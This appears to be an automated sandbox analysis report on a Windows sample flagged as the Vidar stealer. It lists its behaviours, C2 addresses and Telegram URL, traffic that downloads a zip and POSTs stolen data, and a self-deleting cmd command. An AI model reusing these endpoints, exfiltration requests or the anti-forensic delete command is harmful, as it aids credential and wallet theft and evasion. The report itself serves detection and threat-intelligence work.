Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 756295
MD5: 5367709f0a96713b5c9a518e13f306d6
SHA1: 244bdcc9a3548101cacc9c4f8912fb8631764b40
SHA256: 2cc0be582a350f1eafb6d3c6cc713393098a6936346a9070ba55abd346dfb090
Tags: exe

Detection

Vidar
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Self deletion via cmd or bat file
Machine Learning detection for sample
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Uses a known web browser user agent for HTTP communication
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: file.exe ReversingLabs: Detection: 32%
Source: file.exe Virustotal: Detection: 36%
Source: file.exe Joe Sandbox ML: detected
Source: 00000000.00000002.231893309.000000000079A000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "https://t.me/asifrazatg", "Botnet": "1148"}
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040C670 __EH_prolog3_GS,_memset,lstrcat,lstrcat,lstrcat,CloseHandle,Sleep,OpenEventA,CreateEventA,_memset,lstrcat,lstrcat,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,Sleep,_memset,lstrcat,lstrcat,lstrcat,lstrcat,CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,_memset,CryptBinaryToStringA,CreateThread,CreateThread,Sleep,Sleep,_memset,_memset, 2_2_0040C670
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040F7E5 CryptUnprotectData,LocalAlloc,_memmove,LocalFree, 2_2_0040F7E5
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040FA24 _malloc,_memmove,_malloc,CryptUnprotectData,_memmove, 2_2_0040FA24
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040F5CF _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcat,lstrcat, 2_2_0040F5CF
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040F78C CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 2_2_0040F78C
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040C3ED wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_0040C3ED
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00412548 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00412548
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004135E2 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset, 2_2_004135E2
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00409DF4 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose, 2_2_00409DF4
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00411603 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_00411603
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040D624 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,GetFileAttributesA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_0040D624
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00417F60 __EH_prolog3_GS,FindFirstFileW,FindNextFileW, 2_2_00417F60
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004118D3 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_004118D3
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00409284 __EH_prolog3_GS,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcat,lstrlenA,_memset, 2_2_00409284
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004132B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose, 2_2_004132B0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040A392 __EH_prolog3_GS,_memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA, 2_2_0040A392
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\

Networking

Source: Malware configuration extractor URLs: https://t.me/asifrazatg
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /1148 HTTP/1.1Host: 88.198.94.71
Source: global traffic HTTP traffic detected: GET /233910279258.zip HTTP/1.1Host: 88.198.94.71Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4550768666964492Host: 88.198.94.71Content-Length: 110914Connection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
Source: global traffic HTTP traffic detected: GET /asifrazatg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 29 Nov 2022 23:10:04 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 
13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
Source: unknown TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: file.exe, file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://116.202.6.206:80
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://88.198.94.71/
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://88.198.94.71/1148
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://88.198.94.71/233910279258.zip
Source: file.exe, 00000002.00000002.244899570.00000000001AD000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://88.198.94.71:80/233910279258.zip
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://88.198.94.71:80/233910279258.zip8C
Source: file.exe, 00000002.00000002.244899570.00000000001AD000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://88.198.94.71:80/233910279258.zipd87633a38bb03555514232-d06ed635-68f6-4e9a-955c-90ce-806e6f6e6
Source: file.exe, 00000002.00000003.234690206.0000000000764000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257451716.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 58308559385186415876143610.2.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 58308559385186415876143610.2.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 58308559385186415876143610.2.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 58308559385186415876143610.2.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: file.exe, file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199439929669
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: file.exe, file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/asifrazatg
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/asifrazatg&
Source: file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/asifrazatghttps://steamcommunity.com/profiles/76561199439929669http://116.202.6.206:80p
Source: file.exe, 00000002.00000003.234690206.0000000000764000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4550768666964492Host: 88.198.94.71Content-Length: 110914Connection: Keep-AliveCache-Control: no-cache
Source: unknown DNS traffic detected: queries for: t.me
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0040E905 _memset,_memset,_memset,GetProcessHeap,RtlAllocateHeap,_memset,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,_memmove,lstrlenA,_memmove,lstrlenA,lstrlenA,_memmove,lstrlenA,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,_memset,lstrcat,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 2_2_0040E905
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004182AF _memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 2_2_004182AF

System Summary

Source: Process Memory Space: file.exe PID: 5896, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Process Memory Space: file.exe PID: 5896, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0041E31F 2_2_0041E31F
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00406050 2_2_00406050
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00405850 2_2_00405850
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0042101A 2_2_0042101A
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004069EB 2_2_004069EB
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0043127F 2_2_0043127F
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00432BE4 2_2_00432BE4
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004213EC 2_2_004213EC
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00420C7C 2_2_00420C7C
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00430D2E 2_2_00430D2E
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0041B5A7 2_2_0041B5A7
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00421E20 2_2_00421E20
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00431EAC 2_2_00431EAC
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_0041D766 2_2_0041D766
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00407F35 2_2_00407F35
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004317D0 2_2_004317D0
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004217D4 2_2_004217D4
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_004207E7 2_2_004207E7
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00404114 appears 74 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00423610 appears 38 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00428900 appears 44 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00423679 appears 41 times
Source: file.exe, 00000000.00000000.231270305.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHelper.exe. vs file.exe
Source: file.exe, 00000001.00000002.232909854.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHelper.exe. vs file.exe
Source: file.exe, 00000002.00000002.245696548.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHelper.exe. vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameHelper.exe. vs file.exe
Source: file.exe ReversingLabs: Detection: 32%
Source: file.exe Virustotal: Detection: 36%
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: classification engine Classification label: mal96.troj.spyw.evad.winEXE@10/6@1/2
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 82668342394913559298137947.2.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: C:\Users\user\Desktop\file.exe Code function: 2_2_00417648 __EH_prolog3_GS,CreateToolhelp32Snapshot,Process32First,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,Process32Next,CloseHandle, 2_2_00417648
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4656:120:WilError_01
Source: C:\Users\user\Desktop\file.exe Command line argument: VirtualAlloc 0_2_00E81730
Source: C:\Users\user\Desktop\file.exe Command line argument: VirtualAllocEx 0_2_00E81730
Source: C:\Users\user\Desktop\file.exe Command line argument: kernel32.dll 0_2_00E81730
Source: C:\Users\user\Desktop\file.exe Command line argument: VirtualAlloc 2_2_00E81730
Source: C:\Users\user\Desktop\file.exe Command line argument: VirtualAllocEx 2_2_00E81730
Source: C:\Users\user\Desktop\file.exe Command line argument: kernel32.dll 2_2_00E81730
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
